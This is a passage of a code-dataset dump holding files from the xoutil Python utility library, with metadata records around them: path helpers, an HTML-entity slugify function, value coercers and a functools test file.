deprecated:: 1.6.8 The use of params `attr_filter` and `value_filter`.\n\n \"\"\"\n # TODO: @manu Use this in all previous functions with same structure\n frame = inspect.currentframe()\n try:\n deep = 0\n while (deep < max_deep) and (frame is not None):\n yield (\n deep,\n frame.f_code.co_filename,\n frame.f_lineno,\n frame.f_code.co_firstlineno,\n frame.f_locals,\n )\n frame = frame.f_back\n deep += 1\n finally:\n del frame # As recommended in the Python's doc to avoid memory leaks\n\n\ndel deprecated\n" }, { "alpha_fraction": 0.7289156913757324, "alphanum_fraction": 0.7289156913757324, "avg_line_length": 32.20000076293945, "blob_id": "2463cd5a7b3d4dfb74010379799e07cf38f8f8fe", "content_id": "b93a307d4e31606116bf4677b74257e9075793f2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 166, "license_type": "permissive", "max_line_length": 77, "num_lines": 5, "path": "/docs/source/history/_changes-1.7.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added `xoutil.datetime.TimeSpan`:class:.\n\n- Added the module `xoutil.infinity`:mod:.\n\n- Added the keyword argument `on_error` to `xoutil.bound.until_errors`:func:.\n" }, { "alpha_fraction": 0.7540983557701111, "alphanum_fraction": 0.7540983557701111, "avg_line_length": 60, "blob_id": "ca8a234d0f99682ccf063b9493b4ec08006fe26e", "content_id": "fc1bd8ef3014bb116ac8d6e323948efceaeacc9f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 61, "license_type": "permissive", "max_line_length": 60, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xotl.tools.fp.itertools.kleisli_compose_foldl`:func:.\n" }, { "alpha_fraction": 
0.6079632639884949, "alphanum_fraction": 0.6100050806999207, "avg_line_length": 26.398601531982422, "blob_id": "3df2ea5f127a894b154f7cff3c971b50777c5a8c", "content_id": "88482529d25a639e13c9b0d901e544211325c737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3919, "license_type": "no_license", "max_line_length": 83, "num_lines": 143, "path": "/xotl/tools/fs/path.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to os.path\n\nFunctions inside this module must not have side-effects on the\nfile-system. This module re-exports (without change) several functions from the\n`os.path`:mod: standard module.\n\n\"\"\"\n\nimport sys\nfrom os.path import abspath, expanduser, dirname, sep, normpath, join as _orig_join\n\nfrom xotl.tools.future.functools import power as pow_\n\n__all__ = (\n \"abspath\",\n \"expanduser\",\n \"dirname\",\n \"sep\",\n \"normpath\",\n \"rtrim\",\n \"fix_encoding\",\n \"join\",\n \"normalize_path\",\n \"shorten_module_filename\",\n \"shorten_user\",\n)\n\n\n# TODO: import all in \"from os.path import *\"\n\n\ndef rtrim(path, n=1):\n \"\"\"Trims the last `n` components of the pathname `path`.\n\n This basically applies `n` times the function `os.path.dirname` to `path`.\n\n `path` is normalized before proceeding (but not tested to exists).\n\n .. versionchanged:: 1.5.5 `n` defaults to 1. 
In this case rtrim is\n identical to `os.path.dirname`:func:.\n\n Example::\n\n >>> rtrim('/tmp/a/b/c/d', 3)\n '/tmp/a'\n\n # It does not matter if `/` is at the end\n >>> rtrim('/tmp/a/b/c/d/', 3)\n '/tmp/a'\n\n \"\"\"\n return pow_(dirname, n)(normalize_path(path))\n\n\ndef fix_encoding(name, encoding=None):\n \"\"\"Fix encoding of a file system resource name.\n\n `encoding` is ignored if `name` is already a `str`.\n\n \"\"\"\n if not isinstance(name, str):\n if not encoding:\n from xotl.tools.future.codecs import force_encoding\n\n encoding = force_encoding(sys.getfilesystemencoding())\n fixer = name.decode if isinstance(name, bytes) else name.encode\n return fixer(encoding)\n else:\n return name\n\n\ndef join(base, *extras):\n \"\"\"Join two or more pathname components, inserting '/' as needed.\n\n If any component is an absolute path, all previous path components\n will be discarded.\n\n Normalize path (after join parts), eliminating double slashes, etc.\n\n \"\"\"\n try:\n path = _orig_join(base, *extras)\n except Exception: # TODO: @med which exceptions expected?\n base = fix_encoding(base)\n extras = [fix_encoding(extra) for extra in extras]\n path = _orig_join(base, *extras)\n return normpath(path)\n\n\ndef normalize_path(base, *extras):\n \"\"\"Normalize path by:\n\n - expanding '~' and '~user' constructions.\n - eliminating double slashes\n - converting to absolute.\n\n \"\"\"\n # FIXME: [med] Redundant \"path\" in name \"xotl.tools.fs.path.normalize_path\"\n try:\n path = _orig_join(base, *extras)\n except Exception: # TODO: @med which exceptions expected?\n path = join(base, *extras)\n return abspath(expanduser(path))\n\n\ndef shorten_module_filename(filename):\n \"\"\"A filename, normally a module o package name, is shortened looking his\n head in all python path.\n\n \"\"\"\n path = sys.path[:]\n path.sort(lambda x, y: len(y) - len(x))\n for item in path:\n if item and filename.startswith(item):\n filename = filename[len(item) :]\n if 
filename.startswith(sep):\n filename = filename[len(sep) :]\n for item in (\"__init__.py\", \"__init__.pyc\"):\n if filename.endswith(item):\n filename = filename[: -len(item)]\n if filename.endswith(sep):\n filename = filename[: -len(sep)]\n return shorten_user(filename)\n\n\ndef shorten_user(filename):\n \"\"\"A filename is shortened looking for the (expantion) $HOME in his head\n and replacing it by '~'.\n\n \"\"\"\n home = expanduser(\"~\")\n if filename.startswith(home):\n filename = _orig_join(\"~\", filename[len(home) :])\n return filename\n" }, { "alpha_fraction": 0.5790960192680359, "alphanum_fraction": 0.590395450592041, "avg_line_length": 32.89361572265625, "blob_id": "c3aceb1f90852ebbd00078bb9320a89483f216a8", "content_id": "55aab8d7a9d26a32c6f01d4366acd2240214fe1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3187, "license_type": "no_license", "max_line_length": 88, "num_lines": 94, "path": "/xotl/tools/web.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Utils for Web applications.\"\"\"\n\n__all__ = [\"slugify\"]\n\n\n# TODO: Why not deprecate this and use standard `xotl.tools.string.slugify`.\ndef slugify(\n s, entities=True, decimal=True, hexadecimal=True\n): # pragma: no cover # noqa\n \"\"\"Convert a string to a slug representation.\n\n Normalizes string, converts to lower-case, removes non-alpha characters,\n and converts spaces to hyphens.\n\n Parts from http://www.djangosnippets.org/snippets/369/\n\n >>> slugify(\"Manuel Vázquez Acosta\") # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n If `s` and `entities` is True (the default) all HTML entities\n are replaced by 
its equivalent character before normalization::\n\n >>> slugify(\"Manuel V&aacute;zquez Acosta\") # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n If `entities` is False, then no HTML-entities substitution is made::\n\n >>> value = \"Manuel V&aacute;zquez Acosta\"\n >>> slugify(value, entities=False) # doctest: +SKIP\n 'manuel-v-aacute-zquez-acosta'\n\n If `decimal` is True, then all entities of the form ``&#nnnn`` where\n `nnnn` is a decimal number deemed as a unicode codepoint, are replaced by\n the corresponding unicode character::\n\n >>> slugify('Manuel V&#225;zquez Acosta') # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n >>> value = 'Manuel V&#225;zquez Acosta'\n >>> slugify(value, decimal=False) # doctest: +SKIP\n 'manuel-v-225-zquez-acosta'\n\n\n If `hexadecimal` is True, then all entities of the form ``&#nnnn`` where\n `nnnn` is a hexdecimal number deemed as a unicode codepoint, are replaced\n by the corresponding unicode character::\n\n >>> slugify('Manuel V&#x00e1;zquez Acosta') # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n >>> slugify('Manuel V&#x00e1;zquez Acosta', hexadecimal=False) # doctest: +SKIP # noqa\n 'manuel-v-x00e1-zquez-acosta'\n\n .. 
deprecated:: 2.1.0 Use `xotl.tools.strings.slugify`:func:.\n\n \"\"\"\n import re\n from xotl.tools.string import slugify\n from xotl.tools.future.codecs import safe_decode\n\n if not isinstance(s, str):\n s = safe_decode(s)\n if entities:\n try:\n from htmlentitydefs import name2codepoint\n except ImportError:\n # Py3k: The ``htmlentitydefs`` module has been renamed to\n # ``html.entities`` in Python 3\n from html.entities import name2codepoint\n s = re.sub(\n str(\"&(%s);\") % str(\"|\").join(name2codepoint),\n lambda m: chr(name2codepoint[m.group(1)]),\n s,\n )\n if decimal:\n try:\n s = re.sub(r\"&#(\\d+);\", lambda m: chr(int(m.group(1))), s)\n except Exception: # TODO: @med which exceptions are expected?\n pass\n if hexadecimal:\n try:\n s = re.sub(r\"&#x([\\da-fA-F]+);\", lambda m: chr(int(m.group(1), 16)), s)\n except Exception: # TODO: @med which exceptions are expected?\n pass\n return slugify(s, \"-\")\n" }, { "alpha_fraction": 0.6235184073448181, "alphanum_fraction": 0.6279631853103638, "avg_line_length": 26.817787170410156, "blob_id": "ec5d8ea1ccba6a9a3d7819cd8126612fadc4dca8", "content_id": "342843e00697f5ffef21903bb9af879f6b4334fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12825, "license_type": "no_license", "max_line_length": 83, "num_lines": 461, "path": "/xotl/tools/values/simple.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Simple or internal coercers.\n\nWith coercers defined in this module, many of the `xotl.tools.string`:mod:\nutilities could be deprecated.\n\nIn Python 3, all arrays, not only those containing valid byte or unicode\nchars, are 
buffers.\n\n\"\"\"\n\nfrom xotl.tools.values import coercer, nil\n\n\n@coercer\ndef not_false_coercer(arg):\n \"\"\"Validate that `arg` is not a false value.\n\n Python convention for values considered True or False is not used here,\n our false values are only `None` or any false instance of\n `xotl.tools.symbols.boolean`:class: (of course including `False` itself).\n\n \"\"\"\n from xotl.tools.symbols import boolean\n\n false = arg is None or (not arg and isinstance(arg, boolean))\n return arg if not false else nil\n\n\ndef not_false(default):\n \"\"\"Create a coercer that returns `default` if `arg` is considered false.\n\n See `not_false_coercer`:func: for more information on values considered\n false.\n\n \"\"\"\n\n @coercer\n def inner_coercer(arg):\n coercer = not_false_coercer\n return arg if coercer(arg) is arg else coercer(default)\n\n return inner_coercer\n\n\ndef isnot(value):\n \"\"\"Create a coercer that returns `arg` if `arg` is not `value`.\"\"\"\n\n @coercer\n def inner_coercer(arg):\n return arg if arg is not value else nil\n\n return inner_coercer\n\n\n@coercer\ndef name_coerce(arg):\n \"\"\"If `arg` is a named object, return its name, else `nil`.\n\n Object names are always of `str` type, other types are considered\n invalid.\n\n Generator objects has the special `__name__` attribute, but they are\n ignored and considered invalid.\n\n \"\"\"\n from types import GeneratorType\n\n if isinstance(arg, GeneratorType):\n return nil\n else:\n if isinstance(arg, (staticmethod, classmethod)):\n fn = getattr(arg, \"__func__\", None)\n if fn:\n arg = fn\n res = getattr(arg, \"__name__\", None)\n return res if isinstance(res, str) else nil\n\n\n@coercer\ndef iterable_coerce(arg):\n \"\"\"Return the same argument if it is an iterable.\"\"\"\n from collections import Iterable\n\n return arg if isinstance(arg, Iterable) else nil\n\n\ndef collection(arg=nil, avoid=(), force=False, base=None, name=None):\n \"\"\"Coercer for logic collections.\n\n Inner coercer 
returns the same argument if it is a strict iterable. In\n Python, strings are normally iterables, but never in our logic. So::\n\n >>> collection('abc') is nil\n True\n\n This function could directly check an argument if it isn't ``nil``, or\n returns a coercer using extra parameters:\n\n :param avoid: a type or tuple of extra types to ignore as valid\n collections; for example::\n\n >>> collection(avoid=dict)({}) is nil\n True\n >>> collection()({}) is nil\n False\n\n :param force: if main argument is not a valid collection, it is are\n wrapped inner a list::\n\n >>> collection(avoid=(dict,), force=True)({}) == [{}]\n True\n\n :param base: if not ``None``, must be the base to check instead of\n `~collections.Iterable`:class:.\n\n :param name: decorate inner coercer with that function name.\n\n \"\"\"\n if not base:\n from collections import Iterable as base\n if not isinstance(avoid, tuple):\n avoid = (avoid,)\n\n @coercer\n def collection_coerce(arg):\n invalid = (str,) + avoid\n ok = not isinstance(arg, invalid) and isinstance(arg, base)\n return arg if ok else ([arg] if force else nil)\n\n if arg is nil:\n doc = (\n \"Return the same argument if it is a strict iterable.\\n \"\n \"Strings{} are not considered valid iterables in this case.\\n\"\n ).format(\" and {}\".format(avoid) if avoid else \"\")\n if force:\n doc += \" A non iterable argument is wrapped in a list.\\n\"\n collection_coerce.__doc__ = doc\n del doc\n if name:\n collection_coerce.__name__ = name\n return collection_coerce\n else:\n assert not name\n return collection_coerce(arg)\n\n\nfrom collections import Mapping, Sequence # noqa\n\nlogic_iterable_coerce = collection(name=\"logic_iterable_coerce\")\nforce_iterable_coerce = collection(force=True, name=\"force_iterable_coerce\")\nlogic_collection_coerce = collection(avoid=Mapping, name=\"logic_collection_coerce\")\nforce_collection_coerce = collection(\n avoid=Mapping, force=True, name=\"force_collection_coerce\"\n)\nlogic_sequence_coerce = 
collection(\n avoid=Mapping, base=Sequence, name=\"logic_sequence_coerce\"\n)\nforce_sequence_coerce = collection(\n avoid=Mapping, force=True, base=Sequence, name=\"force_sequence_coerce\"\n)\ndel Mapping, Sequence\n\n\n@coercer\ndef decode_coerce(arg):\n \"\"\"Decode objects implementing the buffer protocol.\"\"\"\n import locale\n\n encoding = locale.getpreferredencoding() or \"UTF-8\"\n decode = getattr(arg, \"decode\", None)\n if callable(decode):\n try:\n res = decode(encoding, \"replace\")\n if not isinstance(res, str):\n res = None\n except Exception:\n res = None\n else:\n res = None\n if res is None:\n try:\n # TODO: All arrays are decoded, and not only those containing\n # valid byte or unicode characters.\n import codecs\n\n res = codecs.decode(arg, encoding, \"replace\")\n except Exception:\n res = nil\n return res\n\n\n@coercer\ndef encode_coerce(arg):\n \"\"\"Encode string objects.\"\"\"\n import locale\n\n encoding = locale.getpreferredencoding() or \"UTF-8\"\n encode = getattr(arg, \"encode\", None)\n if callable(encode):\n try:\n res = encode(encoding, \"replace\")\n if not isinstance(res, bytes):\n res = None\n except Exception:\n res = None\n else:\n res = None\n if res is None:\n try:\n import codecs\n\n res = codecs.encode(arg, encoding, \"replace\")\n except Exception:\n res = nil\n return res\n\n\n@coercer\ndef unicode_coerce(arg):\n \"\"\"Decode a buffer or any object returning unicode text.\n\n Uses the defined `encoding` system value.\n\n In Python 2.x unicode has a special type different to `str` but in Python\n 3 coincide with `str` type.\n\n Name is used in named objects, see `name_coerce`:func: for more\n information.\n\n See `str_coerce`:func: to coerce to standard string type, `bytes` in\n Python 2.x and unicode (`str`) in Python 3.\n\n .. 
versionadded:: 1.7.0\n\n \"\"\"\n from array import array\n\n aux = name_coerce(arg)\n if aux is not nil:\n arg = aux\n if isinstance(arg, str):\n return arg\n elif isinstance(arg, bytearray):\n arg = bytes(arg)\n elif isinstance(arg, memoryview):\n arg = arg.tobytes()\n elif isinstance(arg, array):\n try:\n return arg.tounicode()\n except Exception:\n try:\n arg = bytes(bytearray(arg.tolist()))\n except Exception:\n arg = str(arg)\n return arg\n\n res = decode_coerce(arg)\n return str(arg) if res is nil else res\n\n\n@coercer\ndef bytes_coerce(arg):\n \"\"\"Encode an unicode string (or any object) returning a bytes buffer.\n\n Uses the defined `encoding` system value.\n\n In Python 2.x `bytes` coincide with `str` type, in Python 3 `str` uses\n unicode and `str` is different to `bytes`.\n\n There are differences if you want to obtain a buffer in Python 2.x and\n Python 3; for example, the following code obtain different results::\n\n >>> ba = bytes([65, 66, 67])\n\n In Python 2.x is obtained the string ``\"[65, 66, 67]\"`` and in Python 3\n ``b\"ABC\"``. This function normalize these differences.\n\n Name is used in named objects, see `name_coerce`:func: for more\n information.\n\n See `str_coerce`:func: to coerce to standard string type, `bytes` in\n Python 2.x and unicode (`str`) in Python 3.\n\n Always returns the `bytes` type.\n\n .. 
versionadded:: 1.7.0\n\n \"\"\"\n from array import array\n\n aux = name_coerce(arg)\n if aux is not nil:\n arg = aux\n if isinstance(arg, bytes):\n return arg\n elif isinstance(arg, bytearray):\n return bytes(arg)\n elif isinstance(arg, memoryview):\n return arg.tobytes()\n elif isinstance(arg, array):\n try:\n arg = arg.tounicode()\n except Exception:\n try:\n return bytes(bytearray(arg.tolist()))\n except Exception:\n arg = str(arg)\n res = encode_coerce(arg)\n return encode_coerce(str(arg)) if res is nil else res\n\n\n@coercer\ndef str_coerce(arg):\n \"\"\"Coerce to standard string type.\n\n `bytes` in Python 2.x and unicode (`str`) in Python 3.\n\n .. versionadded:: 1.7.0\n\n .. deprecated:: 2.0.6\n\n \"\"\"\n return unicode_coerce(arg)\n\n\n@coercer\ndef ascii_coerce(arg):\n \"\"\"Coerce to string containing only ASCII characters.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n import unicodedata\n\n if not isinstance(arg, str):\n arg = unicode_coerce(arg)\n res = unicodedata.normalize(\"NFKD\", arg).encode(\"ascii\", \"ignore\")\n return str_coerce(res)\n\n\n@coercer\ndef ascii_set_coerce(arg):\n \"\"\"Coerce to string with only ASCII characters removing repetitions.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n return \"\".join(set(ascii_coerce(arg)))\n\n\n@coercer\ndef lower_ascii_coerce(arg):\n \"\"\"Coerce to string containing only lower-case ASCII characters.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n return ascii_coerce(arg).lower()\n\n\n@coercer\ndef lower_ascii_set_coerce(arg):\n \"\"\"Coerce to string with only lower-case ASCII chars removing repetitions.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n return \"\".join(set(lower_ascii_coerce(arg)))\n\n\n@coercer\ndef chars_coerce(arg):\n \"\"\"Convert to unicode characters.\n\n If `arg` is an integer 
between ``0`` and ``0x10ffff`` is converted\n assuming it as ordinal unicode code, else is converted with\n `unicode_coerce`:meth:.\n\n \"\"\"\n if isinstance(arg, int) and 0 <= arg <= 0x10FFFF:\n return chr(arg)\n else:\n return unicode_coerce(arg)\n\n\n@coercer\ndef strict_string_coerce(arg):\n \"\"\"Coerce to string only if argument is a valid string type.\"\"\"\n return str_coerce(arg) if isinstance(arg, str) else nil\n\n\n# TODO: Why is this here\nclass text(str):\n \"\"\"Return a nice text representation of one object.\n\n text(obj='') -> text\n\n text(bytes_or_buffer[, encoding[, errors]]) -> text\n\n Create a new string object from the given object. If `encoding` or\n `errors` is specified, then the object must expose a data buffer that will\n be decoded using the given encoding and error handler. Otherwise, returns\n the result of object text representation.\n\n :param encoding: defaults to ``sys.getdefaultencoding()``.\n\n :param errors: defaults to 'strict'.\n\n Method join is improved, in order to receive any collection of objects,\n as variable number of arguments or as one iterable.\n\n \"\"\"\n\n def __new__(cls, obj=\"\", *args, **kwargs):\n if not (args or kwargs):\n obj = unicode_coerce(obj)\n return super().__new__(cls, obj, *args, **kwargs)\n\n def join(self, *args):\n \"\"\"S.join(variable_number_args or iterable) -> text\n\n Return a text which is the concatenation of the objects (converted to\n text) in argument items. The separator between elements is `S`.\n\n See `chr_join`:meth: for other vertion of this functionality.\n\n \"\"\"\n return self._join(unicode_coerce, args)\n\n def chr_join(self, *args):\n \"\"\"S.chr_join(variable_number_args or iterable) -> text\n\n Return a text which is the concatenation of the objects (converted to\n text) in argument items. 
The separator between elements is `S`.\n\n Difference with `join`:meth: is that integers between ``0`` and\n ``0x10ffff`` are converted to characters as unicode ordinal.\n\n \"\"\"\n return self._join(chars_coerce, args)\n\n def _join(self, coercer, args):\n \"\"\"Protected method to implement `join`:meth: and `chr_join`:meth:.\"\"\"\n from collections import Iterable\n\n if len(args) == 1 and isinstance(args[0], Iterable):\n args = args[0]\n return super().join(coercer(obj) for obj in args)\n" }, { "alpha_fraction": 0.5688151121139526, "alphanum_fraction": 0.5890796780586243, "avg_line_length": 25.514925003051758, "blob_id": "85f530c25c81f6d068d5b8d07c2d485ab27370c3", "content_id": "6afaa73e03df412dc6966b887b8ea63333a7f529", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3554, "license_type": "no_license", "max_line_length": 79, "num_lines": 134, "path": "/tests/test_functools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\n\nfrom contextlib import contextmanager\nfrom datetime import datetime, timedelta\n\nfrom xoutil.future.functools import lru_cache\n\n\n@lru_cache(3)\ndef fib(n):\n print(n)\n if n <= 1:\n return 1\n else:\n # It seems that there's a difference in the execution path for `return\n # fib(n-2) + fib(n-1)` between Python 2.7 and Python 3.2, so let's make\n # more explicit the order we'd like so the test is more reliable.\n a = fib(n - 1)\n b = fib(n - 2)\n return a + b\n\n\ndef takes_no_more_than(duration, msg=None):\n if not msg:\n msg = \"It took longer than {s} seconds\".format(s=duration)\n\n @contextmanager\n def inner():\n start = datetime.now()\n 
yield\n end = datetime.now()\n max_duration = timedelta(seconds=duration)\n if (end - start) > max_duration:\n raise AssertionError(msg)\n\n return inner()\n\n\ndef test_lrucache():\n # Without caching fib(120) would take ages. On a 2.20GHz laptop with\n # caching this takes less than 1 sec, so let's test that it will respond in\n # no more than 3 min to allow very slow machines testing this code.\n fib.cache_clear()\n with takes_no_more_than(90):\n assert fib(120) == 8670007398507948658051921\n\n\ndef test_lrucache_stats():\n pass\n\n\nfrom xoutil.fp.tools import compose, identity\n\n\nclass TestCompose(unittest.TestCase):\n def test_needs_at_least_an_argument(self):\n self.assertIs(compose(), identity)\n\n def test_single_argument_is_identitical(self):\n def anything():\n pass\n\n self.assertIs(anything, compose(anything))\n\n def test_only_callables(self):\n with self.assertRaises(TypeError):\n compose(1)\n\n def test_simple_case(self):\n incr = lambda x: x + 1\n add_3 = compose(incr, incr, incr)\n self.assertEqual(3, add_3(0))\n\n def test_with_pow(self):\n from xoutil.future.functools import power\n\n incr = lambda x: x + 1\n add_1 = power(incr, 1)\n self.assertIs(incr, add_1)\n add_3 = power(incr, 3)\n self.assertEqual(3, add_3(0))\n\n\ndef test_lwraps():\n from xoutil.future.functools import lwraps\n\n class foobar:\n @lwraps(\"method-one\", one=True)\n def one(self):\n return type(self).__name__\n\n @lwraps(\"method-two\", two=True)\n @classmethod\n def two(cls):\n return cls.__name__\n\n @lwraps(\"method-three\", three=True)\n @staticmethod\n def three():\n return \"foobar\"\n\n @lwraps(\"function-four\", four=True, one=False)\n def four(*args):\n return [(arg.__name__, arg()) for arg in args]\n\n f = foobar()\n names = (\"method-one\", \"method-two\", \"method-three\", \"function-four\")\n\n assert four.__name__ == names[3]\n assert foobar.one.__name__ == names[0]\n assert foobar.two.__name__ == names[1]\n assert foobar.three.__name__ == names[2]\n assert 
f.one.__name__ == names[0]\n assert f.two.__name__ == names[1]\n assert f.three.__name__ == names[2]\n\n assert four.four\n assert not four.one\n assert f.one.one\n assert f.two.two\n assert f.three.three\n\n for i, (a, b) in enumerate(four(f.one, f.two, f.three)):\n assert a == names[i]\n assert b == \"foobar\"\n" }, { "alpha_fraction": 0.420895516872406, "alphanum_fraction": 0.420895516872406, "avg_line_length": 46.85714340209961, "blob_id": "e8d30bd1bb7f6cbc0de3ab313ab2a5db4f8ae155", "content_id": "de616626a196bcedddaeac70c40a822e325c2c57", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 335, "license_type": "permissive", "max_line_length": 74, "num_lines": 7, "path": "/docs/source/xotl.tools/testing/datetime.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "========================================================================\n :mod:`xotl.tools.testing.datetime` -- Generators for date and datetime\n========================================================================\n\n.. module:: xotl.tools.testing.datetime\n\n.. 
autofunction:: timespans(dates=None, unbounds='any', always_valid=True)\n" }, { "alpha_fraction": 0.5514221787452698, "alphanum_fraction": 0.5561420917510986, "avg_line_length": 27.934412002563477, "blob_id": "8f68dd535f5794ab63e77d9d23581a03ee9620a6", "content_id": "dcdd02187b427aa0a091ed9818ddc5cdf6fcfb0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32209, "license_type": "no_license", "max_line_length": 84, "num_lines": 1113, "path": "/xotl/tools/values/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some generic coercers (or checkers) for value types.\n\nThis module coercion function are not related in any way to deprecated old\npython feature, are similar to a combination of object mold/check:\n\n- *Mold* - Fit values to expected conventions.\n\n- *Check* - These functions must return `nil` [#pyni]_ special value to\n specify that expected fit is not possible.\n\n.. [#pyni] We don't use Python classic `NotImplemented` special value in order\n to obtain False if the value is not coerced (`nil`).\n\nA custom coercer could be created with closures, for an example see\n`create_int_range_coerce`:func:.\n\nThis module uses `Unset` value to define absent -not being specified-\narguments.\n\nAlso contains sub-modules to obtain, convert and check values of common types.\n\n.. 
versionadded:: 1.7.0\n\n\"\"\"\n\nimport re\nfrom abc import ABCMeta\n\nfrom xotl.tools.future.functools import lwraps\nfrom xotl.tools.symbols import boolean, Unset\nfrom xotl.tools.fp.prove import vouch\n\nfrom xotl.tools.deprecation import deprecate_linked\n\ndeprecate_linked(check=\"xotl.tools.values\")\ndel deprecate_linked\n\n\n_coercer_decorator = lwraps(__coercer__=True) # FIX: refactor\n\n\nclass logical(boolean):\n \"\"\"Represent Common Lisp two special values `t` and `nil`.\n\n Include redefinition of `__call__`:meth: to check values with special\n semantic:\n\n - When called as ``t(arg)``, check if `arg` is not `nil` returning a\n logical true: the same argument if `arg` is nil or a true boolean value,\n else return `t`. That means that `False` or `0` are valid true values\n for Common Lisp but not for Python.\n\n - When called as ``nil(arg)``, check if `arg` is `nil` returning `t` or\n `nil` if not.\n\n Constructor could receive a valid name ('nil' or 't') or any other\n ``boolean`` instance.\n\n \"\"\"\n\n __slots__ = ()\n _valid = {\"nil\": False, \"t\": True}\n\n def __new__(cls, arg):\n from xotl.tools.symbols import boolean\n from xotl.tools.symbols import Invalid\n\n name = (\"t\" if arg else \"nil\") if isinstance(arg, boolean) else arg\n value = cls._valid.get(name, Invalid)\n if value is not Invalid:\n return super().__new__(cls, name, value)\n else:\n msg = 'retrieving invalid logical instance \"{}\"'\n raise TypeError(msg.format(arg))\n\n def __call__(self, arg):\n if self: # self is t\n return arg if arg or arg is nil else self\n else: # self is nil\n return t if arg is self else self\n\n\nnil, t = logical(\"nil\"), logical(\"t\")\n\n\nclass MetaCoercer(ABCMeta):\n r\"\"\"Meta-class for `coercer`:class:.\n\n This meta-class allows that several objects are considered valid instances\n of `coercer`:class:\\ :\n\n - Functions decorated with `coercer`:class: (used with its decorator\n facet).\n\n - Instances of any sub-class of 
`custom`:class:.\n\n - Instances of `coercer`:class: itself.\n\n See the class declaration (`coercer`:class:) for more information.\n\n \"\"\"\n\n def __instancecheck__(self, instance):\n return getattr(instance, \"__coercer__\", False) or super().__instancecheck__(\n instance\n )\n\n\nclass coercer(metaclass=MetaCoercer):\n \"\"\"Special coercer class.\n\n This class has several facets:\n\n - Pure type-checkers when a type or tuple of types are received as\n argument. See `istype`:class: for more information.\n\n - Return equivalent coercer from some special values:\n\n * Any true value -> identity_coerce\n\n * Any false or empty value -> void_coerce\n\n - A decorator for functions; when a function is given, decorate it to\n become a coercer. The mark itself is not enough, functions intended to\n be coercers must fulfills the protocol (not to produce exception and\n return `nil` on fails). For example::\n\n >>> @coercer\n ... def age_coerce(arg):\n ... res = int_coerce(arg)\n ... return res if t(res) and 0 < arg <= 120 else nil\n\n # TODO: Change next, don't use isinstance\n >>> isinstance(age_coerce, coercer)\n True\n\n \"\"\"\n\n __slots__ = ()\n __coercer__ = True\n\n def __new__(cls, source):\n from types import FunctionType as function\n from xotl.tools.symbols import boolean\n\n if source == 1 and isinstance(source, boolean):\n return identity_coerce\n elif source is None or (source == 0 and isinstance(source, boolean)):\n return void_coerce\n elif isinstance(source, coercer): # TODO: don't use isinstance\n return source\n elif isinstance(source, (function, staticmethod, classmethod)):\n return _coercer_decorator(source)\n else:\n inner = types_tuple_coerce(source)\n return istype(inner) if inner else nil\n\n\ndef coercer_name(arg, join=None):\n \"\"\"Get the name of a coercer.\n\n :param arg: Coercer to get the name. Also processes collections (tuple,\n list, or set) of coercers. 
